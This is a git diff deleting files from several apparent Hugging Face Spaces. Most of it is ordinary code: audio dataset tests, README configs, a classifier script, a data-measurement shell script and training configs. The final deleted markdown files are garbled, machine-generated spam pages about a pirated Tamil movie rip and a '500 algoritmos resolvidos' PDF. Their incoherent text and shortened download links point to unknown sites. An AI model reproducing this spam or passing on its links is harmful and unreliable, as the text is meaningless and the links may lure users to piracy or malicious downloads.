- assert m.sample_rate == sample_rate, 'sample rate does not match' - assert m.duration == duration, 'duration does not match' - assert m.amplitude is None - assert m.info_path is None - - def test_save_audio_meta(self): - audio_meta = [ - AudioMeta("mypath1", 1., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file1.json')), - AudioMeta("mypath2", 2., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file2.json')) - ] - empty_audio_meta = [] - for idx, meta in enumerate([audio_meta, empty_audio_meta]): - path = self.get_temp_path(f'data_{idx}_save.jsonl') - save_audio_meta(path, meta) - with open(path, 'r') as f: - lines = f.readlines() - read_meta = [AudioMeta.from_dict(json.loads(line)) for line in lines] - assert len(read_meta) == len(meta) - for m, read_m in zip(meta, read_meta): - assert m == read_m - - def test_load_audio_meta(self): - try: - import dora - except ImportError: - dora = None # type: ignore - - audio_meta = [ - 
AudioMeta("mypath1", 1., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file1.json')), - AudioMeta("mypath2", 2., 16_000, None, None, PathInZip('/foo/bar.zip:/relative/file2.json')) - ] - empty_meta = [] - for idx, meta in enumerate([audio_meta, empty_meta]): - path = self.get_temp_path(f'data_{idx}_load.jsonl') - with open(path, 'w') as f: - for m in meta: - json_str = json.dumps(m.to_dict()) + '\n' - f.write(json_str) - read_meta = load_audio_meta(path) - assert len(read_meta) == len(meta) - for m, read_m in zip(meta, read_meta): - if dora: - m.path = dora.git_save.to_absolute_path(m.path) - assert m == read_m, f'original={m}, read={read_m}' - - -class TestAudioDataset(TempDirMixin): - - def _create_audio_files(self, - root_name: str, - num_examples: int, - durations: tp.Union[float, tp.Tuple[float, float]] = (0.1, 1.), - sample_rate: int = 16_000, - channels: int = 1): - root_dir = self.get_temp_dir(root_name) - for i in range(num_examples): - if isinstance(durations, float): - duration = durations - elif isinstance(durations, tuple) and len(durations) == 1: - duration = durations[0] - elif isinstance(durations, tuple) and len(durations) == 2: - duration = random.uniform(durations[0], durations[1]) - else: - assert False - n_frames = int(duration * sample_rate) - wav = get_white_noise(channels, n_frames) - path = os.path.join(root_dir, f'example_{i}.wav') - save_wav(path, wav, sample_rate) - return root_dir - - def _create_audio_dataset(self, - root_name: str, - total_num_examples: int, - durations: tp.Union[float, tp.Tuple[float, float]] = (0.1, 1.), - sample_rate: int = 16_000, - channels: int = 1, - segment_duration: tp.Optional[float] = None, - num_examples: int = 10, - shuffle: bool = True, - return_info: bool = False): - root_dir = self._create_audio_files(root_name, total_num_examples, durations, sample_rate, channels) - dataset = AudioDataset.from_path(root_dir, - minimal_meta=True, - segment_duration=segment_duration, - num_samples=num_examples, 
- sample_rate=sample_rate, - channels=channels, - shuffle=shuffle, - return_info=return_info) - return dataset - - def test_dataset_full(self): - total_examples = 10 - min_duration, max_duration = 1., 4. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), - sample_rate=sample_rate, channels=channels, segment_duration=None) - assert len(dataset) == total_examples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] <= int(max_duration * sample_rate) - assert sample.shape[1] >= int(min_duration * sample_rate) - - def test_dataset_segment(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples) - assert len(dataset) == num_samples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == int(segment_duration * sample_rate) - - def test_dataset_equal_audio_and_segment_durations(self): - total_examples = 1 - num_samples = 2 - audio_duration = 1. - segment_duration = 1. 
- sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=audio_duration, sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples) - assert len(dataset) == num_samples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == int(segment_duration * sample_rate) - # the random seek_time adds variability on audio read - sample_1 = dataset[0] - sample_2 = dataset[1] - assert not torch.allclose(sample_1, sample_2) - - def test_dataset_samples(self): - total_examples = 1 - num_samples = 2 - audio_duration = 1. - segment_duration = 1. - sample_rate = 16_000 - channels = 1 - - create_dataset = partial( - self._create_audio_dataset, - 'dset', total_examples, durations=audio_duration, sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, - ) - - dataset = create_dataset(shuffle=True) - # when shuffle = True, we have different inputs for the same index across epoch - sample_1 = dataset[0] - sample_2 = dataset[0] - assert not torch.allclose(sample_1, sample_2) - - dataset_noshuffle = create_dataset(shuffle=False) - # when shuffle = False, we have same inputs for the same index across epoch - sample_1 = dataset_noshuffle[0] - sample_2 = dataset_noshuffle[0] - assert torch.allclose(sample_1, sample_2) - - def test_dataset_return_info(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = 1. 
- sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=True) - assert len(dataset) == num_samples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample, segment_info = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == int(segment_duration * sample_rate) - assert segment_info.sample_rate == sample_rate - assert segment_info.total_frames == int(segment_duration * sample_rate) - assert segment_info.n_frames <= int(segment_duration * sample_rate) - assert segment_info.seek_time >= 0 - - def test_dataset_return_info_no_segment_duration(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = None - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=True) - assert len(dataset) == total_examples - assert dataset.sample_rate == sample_rate - assert dataset.channels == channels - for idx in range(len(dataset)): - sample, segment_info = dataset[idx] - assert sample.shape[0] == channels - assert sample.shape[1] == segment_info.total_frames - assert segment_info.sample_rate == sample_rate - assert segment_info.n_frames <= segment_info.total_frames - - def test_dataset_collate_fn(self): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - segment_duration = 1. 
- sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=False) - batch_size = 4 - dataloader = DataLoader( - dataset, - batch_size=batch_size, - num_workers=0 - ) - for idx, batch in enumerate(dataloader): - assert batch.shape[0] == batch_size - - @pytest.mark.parametrize("segment_duration", [1.0, None]) - def test_dataset_with_meta_collate_fn(self, segment_duration): - total_examples = 10 - num_samples = 20 - min_duration, max_duration = 1., 4. - sample_rate = 16_000 - channels = 1 - dataset = self._create_audio_dataset( - 'dset', total_examples, durations=(min_duration, max_duration), sample_rate=sample_rate, - channels=channels, segment_duration=segment_duration, num_examples=num_samples, return_info=True) - batch_size = 4 - dataloader = DataLoader( - dataset, - batch_size=batch_size, - collate_fn=dataset.collater, - num_workers=0 - ) - for idx, batch in enumerate(dataloader): - wav, infos = batch - assert wav.shape[0] == batch_size - assert len(infos) == batch_size - - @pytest.mark.parametrize("segment_duration,sample_on_weight,sample_on_duration,a_hist,b_hist,c_hist", [ - [1, True, True, 0.5, 0.5, 0.0], - [1, False, True, 0.25, 0.5, 0.25], - [1, True, False, 0.666, 0.333, 0.0], - [1, False, False, 0.333, 0.333, 0.333], - [None, False, False, 0.333, 0.333, 0.333]]) - def test_sample_with_weight(self, segment_duration, sample_on_weight, sample_on_duration, a_hist, b_hist, c_hist): - random.seed(1234) - rng = torch.Generator() - rng.manual_seed(1234) - - def _get_histogram(dataset, repetitions=20_000): - counts = {file_meta.path: 0. 
for file_meta in meta} - for _ in range(repetitions): - file_meta = dataset.sample_file(rng) - counts[file_meta.path] += 1 - return {name: count / repetitions for name, count in counts.items()} - - meta = [ - AudioMeta(path='a', duration=5, sample_rate=1, weight=2), - AudioMeta(path='b', duration=10, sample_rate=1, weight=None), - AudioMeta(path='c', duration=5, sample_rate=1, weight=0), - ] - dataset = AudioDataset( - meta, segment_duration=segment_duration, sample_on_weight=sample_on_weight, - sample_on_duration=sample_on_duration) - hist = _get_histogram(dataset) - assert math.isclose(hist['a'], a_hist, abs_tol=0.01) - assert math.isclose(hist['b'], b_hist, abs_tol=0.01) - assert math.isclose(hist['c'], c_hist, abs_tol=0.01) - - def test_meta_duration_filter_all(self): - meta = [ - AudioMeta(path='a', duration=5, sample_rate=1, weight=2), - AudioMeta(path='b', duration=10, sample_rate=1, weight=None), - AudioMeta(path='c', duration=5, sample_rate=1, weight=0), - ] - # a bare `assert False` sentinel would itself raise AssertionError and be - # swallowed by the except clause, so the test could never fail; use - # pytest.raises to assert the constructor rejects an over-long segment - with pytest.raises(AssertionError): - AudioDataset(meta, segment_duration=11, min_segment_ratio=1) - - def test_meta_duration_filter_long(self): - meta = [ - AudioMeta(path='a', duration=5, sample_rate=1, weight=2), - AudioMeta(path='b', duration=10, sample_rate=1, weight=None), - AudioMeta(path='c', duration=5, sample_rate=1, weight=0), - ] - dataset = AudioDataset(meta, segment_duration=None, min_segment_ratio=1, max_audio_duration=7) - assert len(dataset) == 2 diff --git a/spaces/hemanthbylupudi/mygenAI/README.md b/spaces/hemanthbylupudi/mygenAI/README.md deleted file mode 100644 index 97e3a0c849658af7ff6d7915fa9da86b27678d57..0000000000000000000000000000000000000000 --- a/spaces/hemanthbylupudi/mygenAI/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: MygenAI -emoji: 📊 -colorFrom: red -colorTo: pink -sdk: gradio -sdk_version: 3.39.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference 
diff --git a/spaces/hs1l/Date/README.md b/spaces/hs1l/Date/README.md deleted file mode 100644 index d145c1fbff533cb91c3db0605c3d44e44be6f9ac..0000000000000000000000000000000000000000 --- a/spaces/hs1l/Date/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Date -emoji: 🐨 -colorFrom: yellow -colorTo: gray -sdk: streamlit -sdk_version: 1.15.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/huggingchat/chat-ui/src/lib/types/MessageUpdate.ts b/spaces/huggingchat/chat-ui/src/lib/types/MessageUpdate.ts deleted file mode 100644 index ceae608615504839a540406d45154c3995f4b9a4..0000000000000000000000000000000000000000 --- a/spaces/huggingchat/chat-ui/src/lib/types/MessageUpdate.ts +++ /dev/null @@ -1,39 +0,0 @@ -import type { WebSearchSource } from "./WebSearch"; - -export type FinalAnswer = { - type: "finalAnswer"; - text: string; -}; - -export type TextStreamUpdate = { - type: "stream"; - token: string; -}; - -export type AgentUpdate = { - type: "agent"; - agent: string; - content: string; - binary?: Blob; -}; - -export type WebSearchUpdate = { - type: "webSearch"; - messageType: "update" | "error" | "sources"; - message: string; - args?: string[]; - sources?: WebSearchSource[]; -}; - -export type StatusUpdate = { - type: "status"; - status: "started" | "pending" | "finished" | "error" | "title"; - message?: string; -}; - -export type MessageUpdate = - | FinalAnswer - | TextStreamUpdate - | AgentUpdate - | WebSearchUpdate - | StatusUpdate; diff --git a/spaces/huggingface-projects/InstructPix2Pix-Chatbot-ui/frontend/vite.config.ts b/spaces/huggingface-projects/InstructPix2Pix-Chatbot-ui/frontend/vite.config.ts deleted file mode 100644 index 16950342c1a41f60729f1abfcbbf67676c08e1bb..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/InstructPix2Pix-Chatbot-ui/frontend/vite.config.ts +++ /dev/null @@ -1,8 +0,0 @@ -import { sveltekit } from 
'@sveltejs/kit/vite'; -import type { UserConfig } from 'vite'; - -const config: UserConfig = { - plugins: [sveltekit()] -}; - -export default config; diff --git a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/1-8296099a.js b/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/1-8296099a.js deleted file mode 100644 index c2619ec6894b5b4666b45c66bd4238141e5688ec..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/color-palette-generator-sd/static/_app/immutable/chunks/1-8296099a.js +++ /dev/null @@ -1 +0,0 @@ -import{default as t}from"../components/error.svelte-130ca573.js";export{t as component}; diff --git a/spaces/huggingface-projects/diffusers-gallery-bot/classifier.py b/spaces/huggingface-projects/diffusers-gallery-bot/classifier.py deleted file mode 100644 index b4edfa43f450d75b08fe66dc8cd4fd4f8ebe254e..0000000000000000000000000000000000000000 --- a/spaces/huggingface-projects/diffusers-gallery-bot/classifier.py +++ /dev/null @@ -1,70 +0,0 @@ -import os -import re -import requests -import json -import subprocess -from io import BytesIO -import uuid - -from math import ceil -from tqdm import tqdm -from pathlib import Path - -from db import Database - -DB_FOLDER = Path("diffusers-gallery-data") - -database = Database(DB_FOLDER) - - -CLASSIFIER_URL = "https://radames-aesthetic-style-nsfw-classifier.hf.space/run/inference" -ASSETS_URL = "https://d26smi9133w0oo.cloudfront.net/diffusers-gallery/" - - -def main(): - - with database.get_db() as db: - cursor = db.cursor() - cursor.execute(""" - SELECT * - FROM models - """) - results = list(cursor.fetchall()) - - for row in tqdm(results): - row_id = row['id'] - # keep json data on row_data - row_data = json.loads(row['data']) - print("updating row", row_id) - images = row_data['images'] - - # filter nones - images = [i for i in images if i is not None] - if len(images) > 0: - # classifying only the first image - images_urls = 
[ASSETS_URL + images[0]] - response = requests.post(CLASSIFIER_URL, json={"data": [ - {"urls": images_urls}, # json urls: list of images urls - False, # enable/disable gallery image output - None, # single image input - None, # files input - ]}).json() - - # data response is array data:[[{img0}, {img1}, {img2}...], Label, Gallery], - class_data = response['data'][0][0] - class_data_parsed = {row['label']: round( - row['score'], 3) for row in class_data} - - # update row data with classificator data - row_data['class'] = class_data_parsed - else: - row_data['class'] = {} - with database.get_db() as db: - cursor = db.cursor() - cursor.execute("UPDATE models SET data = ? WHERE id = ?", - [json.dumps(row_data), row_id]) - db.commit() - - -if __name__ == "__main__": - main() diff --git a/spaces/huggingface/data-measurements-tool/run.sh b/spaces/huggingface/data-measurements-tool/run.sh deleted file mode 100644 index ee9d16cf59621eeb762e4a9f3f46be17db934637..0000000000000000000000000000000000000000 --- a/spaces/huggingface/data-measurements-tool/run.sh +++ /dev/null @@ -1,112 +0,0 @@ -#!/usr/bin/env bash - - -python3 run_data_measurements.py --dataset="hate_speech18" --config="default" --split="train" --label_field="label" --feature="text" -python3 run_data_measurements.py --dataset="hate_speech_offensive" --config="default" --split="train" --label_field="label" --feature="tweet" - - -python3 run_data_measurements.py --dataset="imdb" --config="plain_text" --split="train" --label_field="label" --feature="text" -python3 run_data_measurements.py --dataset="imdb" --config="plain_text" --split="unsupervised" --label_field="label" --feature="text" - - -python3 run_data_measurements.py --dataset="glue" --config="cola" --split="train" --label_field="label" --feature="sentence" -python3 run_data_measurements.py --dataset="glue" --config="cola" --split="validation" --label_field="label" --feature="sentence" - -python3 run_data_measurements.py --dataset="glue" --config="mnli" 
--split="train" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="train" --label_field="label" --feature="premise" - -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_matched" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_matched" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_mismatched" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="glue" --config="mnli" --split="validation_mismatched" --label_field="label" --feature="hypothesis" - - -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="mrpc" --split="validation" --label_field="label" --feature="sentence2" - - -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="rte" --split="validation" --label_field="label" --feature="sentence2" - - -python3 run_data_measurements.py --dataset="glue" --config="stsb" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="stsb" 
--split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="stsb" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="stsb" --split="validation" --label_field="label" --feature="sentence2" - -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="train" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="train" --label_field="label" --feature="sentence2" -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="validation" --label_field="label" --feature="sentence1" -python3 run_data_measurements.py --dataset="glue" --config="wnli" --split="validation" --label_field="label" --feature="sentence2" - -python3 run_data_measurements.py --dataset="glue" --config="sst2" --split="train" --label_field="label" --feature="sentence" -python3 run_data_measurements.py --dataset="glue" --config="sst2" --split="validation" --label_field="label" --feature="sentence" - - -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="train" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="train" --label_field="label" --feature="sentence" -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="validation" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="glue" --config="qnli" --split="validation" --label_field="label" --feature="sentence" - - -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="train" --label_field="label" --feature="question1" -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="train" --label_field="label" --feature="question2" -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="validation" --label_field="label" 
--feature="question1" -python3 run_data_measurements.py --dataset="glue" --config="qqp" --split="validation" --label_field="label" --feature="question2" - -python3 run_data_measurements.py --dataset="glue" --config="mnli_matched" --split="validation" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli_matched" --split="validation" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="glue" --config="mnli_mismatched" --split="validation" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="glue" --config="mnli_mismatched" --split="validation" --label_field="label" --feature="premise" - - -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-raw-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-raw-v1" --split="train" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-v1" --split="validation" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-103-raw-v1" --split="validation" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-v1" --split="validation" --feature="text" -python3 run_data_measurements.py --dataset="wikitext" --config="wikitext-2-raw-v1" --split="validation" --feature="text" - - -# Superglue wsc? wic? rte? record? multirc? 
- -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="train" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="validation" --label_field="label" --feature="question" -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="train" --label_field="label" --feature="passage" -python3 run_data_measurements.py --dataset="super_glue" --config="boolq" --split="validation" --label_field="label" --feature="passage" - -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="train" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="validation" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="train" --label_field="label" --feature="hypothesis" -python3 run_data_measurements.py --dataset="super_glue" --config="cb" --split="validation" --label_field="label" --feature="hypothesis" - - -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="premise" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" --feature="choice1" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="choice1" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" --feature="choice2" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="choice2" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="train" --label_field="label" 
--feature="question" -python3 run_data_measurements.py --dataset="super_glue" --config="copa" --split="validation" --label_field="label" --feature="question" - -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="train" --feature="context" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="train" --feature="question" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="train" --feature="title" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="validation" --feature="context" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="validation" --feature="question" -python3 run_data_measurements.py --dataset="squad" --config="plain_text" --split="validation" --feature="title" - - -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="train" --feature="context" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="train" --feature="question" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="train" --feature="title" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="validation" --feature="context" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="validation" --feature="question" -python3 run_data_measurements.py --dataset="squad_v2" --config="squad_v2" --split="validation" --feature="title" diff --git a/spaces/hugginglearners/malayalam-news-classify/app.py b/spaces/hugginglearners/malayalam-news-classify/app.py deleted file mode 100644 index 740a862d815e0b8ed9cc3eed7f96aae13286ab3a..0000000000000000000000000000000000000000 --- a/spaces/hugginglearners/malayalam-news-classify/app.py +++ /dev/null @@ -1,28 +0,0 @@ -from pathlib import Path -import gradio as gr -from huggingface_hub import from_pretrained_fastai - - -LABELS = 
Path('class_names.txt').read_text().splitlines() - - - -def predict(news_headline): - learner = from_pretrained_fastai("hugginglearners/ml-news-classify-fastai") - - probabilities = learner.predict(news_headline) - - return {LABELS[i]: probabilities[0]['probs'][i] for i in range(len(LABELS))} - -interface = gr.Interface( - predict, - inputs="textbox", - outputs='label', - theme="huggingface", - title="Malayalam News Classifier", - description="Try to classify news in മലയാളം? Input a few malayalam news headlines and verify whether the model categorized it appropriately!", - article = "
Malayalam News Classifier | Demo Model
    ", - examples=[["ഓഹരി വിപണി തകരുമ്പോള്‍ നിക്ഷേപം എങ്ങനെ സുരക്ഷിതമാക്കാം"], ["വാര്‍ണറുടെ ഒറ്റക്കയ്യന്‍ ക്യാച്ചില്‍ അമ്പരന്ന് ക്രിക്കറ്റ് ലോകം"]], - # live=True, - share=True) -interface.launch(debug=True) diff --git a/spaces/hyxue/HiFiFace-inference-demo/arcface_torch/configs/wf12m_conflict_r50_pfc03_filter04.py b/spaces/hyxue/HiFiFace-inference-demo/arcface_torch/configs/wf12m_conflict_r50_pfc03_filter04.py deleted file mode 100644 index a766f4154bb801b57d0f9519748b63941e349330..0000000000000000000000000000000000000000 --- a/spaces/hyxue/HiFiFace-inference-demo/arcface_torch/configs/wf12m_conflict_r50_pfc03_filter04.py +++ /dev/null @@ -1,28 +0,0 @@ -from easydict import EasyDict as edict - -# make training faster -# our RAM is 256G -# mount -t tmpfs -o size=140G tmpfs /train_tmp - -config = edict() -config.margin_list = (1.0, 0.0, 0.4) -config.network = "r50" -config.resume = False -config.output = None -config.embedding_size = 512 -config.sample_rate = 0.3 -config.interclass_filtering_threshold = 0.4 -config.fp16 = True -config.weight_decay = 5e-4 -config.batch_size = 128 -config.optimizer = "sgd" -config.lr = 0.1 -config.verbose = 2000 -config.dali = False - -config.rec = "/train_tmp/WebFace12M_Conflict" -config.num_classes = 1017970 -config.num_image = 12720066 -config.num_epoch = 20 -config.warmup_epoch = config.num_epoch // 10 -config.val_targets = [] diff --git a/spaces/iamstolas/STOLAS/tests/kblob.ts b/spaces/iamstolas/STOLAS/tests/kblob.ts deleted file mode 100644 index 9e15b41c1c94a690beb61b23cdb42fc78767ccd2..0000000000000000000000000000000000000000 --- a/spaces/iamstolas/STOLAS/tests/kblob.ts +++ /dev/null @@ -1,27 +0,0 @@ -import FormData from 'form-data' - -import { fetch } from '@/lib/isomorphic' - -const formData = new FormData() - -const knowledgeRequest = 
{"imageInfo":{"url":"https://www.baidu.com/img/PCfb_5bf082d29588c07f842ccde3f97243ea.png"},"knowledgeRequest":{"invokedSkills":["ImageById"],"subscriptionId":"Bing.Chat.Multimodal","invokedSkillsRequestData":{"enableFaceBlur":true},"convoData":{"convoid":"51D|BingProdUnAuthenticatedUsers|E3DCA904FF236C67C3450163BCEC64CFF3F618CC8A4AFD75FD518F5ED0ADA080","convotone":"Creative"}}} - -formData.append('knowledgeRequest', JSON.stringify(knowledgeRequest)) - - -fetch('https://bing.vcanbb.top/images/kblob', - { - method: 'POST', - body: formData.getBuffer(), - headers: { - "sec-ch-ua": "\"Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"115\", \"Chromium\";v=\"115\"", - "sec-ch-ua-mobile": "?0", - "sec-ch-ua-platform": "\"Windows\"", - "Referer": "https://bing.vcanbb.top/web/index.html", - "Referrer-Policy": "origin-when-cross-origin", - ...formData.getHeaders() - } - - } -).then(res => res.text()) -.then(res => console.log('res', res)) diff --git a/spaces/imperialwool/funapi/routes/__init__.py b/spaces/imperialwool/funapi/routes/__init__.py deleted file mode 100644 index 678a90f40765a6caa462ea594f926732ea251128..0000000000000000000000000000000000000000 --- a/spaces/imperialwool/funapi/routes/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -from .jokes import * -from .ytApi import * -from .osuApi import * -from .helpers import * -from .holidays import * -from .siteRoutes import * \ No newline at end of file diff --git a/spaces/imseldrith/FaceSwap/roop/processors/__init__.py b/spaces/imseldrith/FaceSwap/roop/processors/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil] BETTER.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil] BETTER.md deleted file mode 100644 index 
703f727a965bfce33342fda73349bb790321fb64..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil] BETTER.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Inimey Ippadithaan (2015)[HDRip - x264 - 700MB - ESubs - Tamil]


    Download ☆☆☆ https://urlin.us/2uEwgX



    -
    -Aaru Tamil Movie Online in HD - Einthusan Directed by Hari Music by Devi Sri Prasad. ... Inimey Ippadithaan (2015)[HDRip - X264 - 700MB - ESubs - Tamil]. 1fdad05405
    -
    -
    -

    diff --git a/spaces/inreVtussa/clothingai/Examples/500 Algoritmos Resolvidos Download Pdf.md b/spaces/inreVtussa/clothingai/Examples/500 Algoritmos Resolvidos Download Pdf.md deleted file mode 100644 index 55c05d63162f38e971694d38a6f2d714c634f001..0000000000000000000000000000000000000000 --- a/spaces/inreVtussa/clothingai/Examples/500 Algoritmos Resolvidos Download Pdf.md +++ /dev/null @@ -1,11 +0,0 @@ -
    -

    2. Ani. DOWNLOAD PDF. Introduo programao - 500 Algoritimos Resolvidos - Ani. Desde os anos de 1950, e csc, resolvido o inteiro e atual ciclo chamado CEDAN. Desempenho e seguran. nda. educacao, e ajuda do meio de, envolvido no estudo de vai para trabalhar, como ex. ciclo de suas observaçoes.

    -

    500 algoritmos resolvidos download pdf


    Download File ››››› https://tiurll.com/2uCkjd



    -

    Download arquivos em pdf enviados na rede iniciado e terminou automaticamente. Introduo programao. Introduo programao - 500 Algoritimos Resolvidos - Ani. Desempenho e seguran. nda. educacao, e ajuda do meio de, envolvido no estudo de vai para trabalhar, como ex. ciclo de suas observaçoes.

    -

    2. Ani. DOWNLOAD PDF. Introduo programao - 500 Algoritimos Resolvidos - Ani. Desempenho, e seguran. nda. educacao, e ajuda do meio de, envolvido no estudo de vai para trabalhar, como ex. ciclo de suas observaçoes.

    -

    Bandcamp Não possui mais para baixar.. 500 algoritmos resolvidos download pdf.
    Nas companhias oficiais não temos esse tipo de banco comum. Hiv HQ Hiv And I Applied For Adoption To Become Half Asian And Half White On U.S. Naturalization Form. English-Hindi

    -

    Hulu Plus mais facil download gratuido.com.. 500 algoritmos resolvidos download pdf. For Netflix there's no Windows 10, so it's a matter of getting. Drexel University. They offer a lot of nice courses.
    14.8 MB 5058 downloads.
    500 algoritmos resolvidos download pdf.
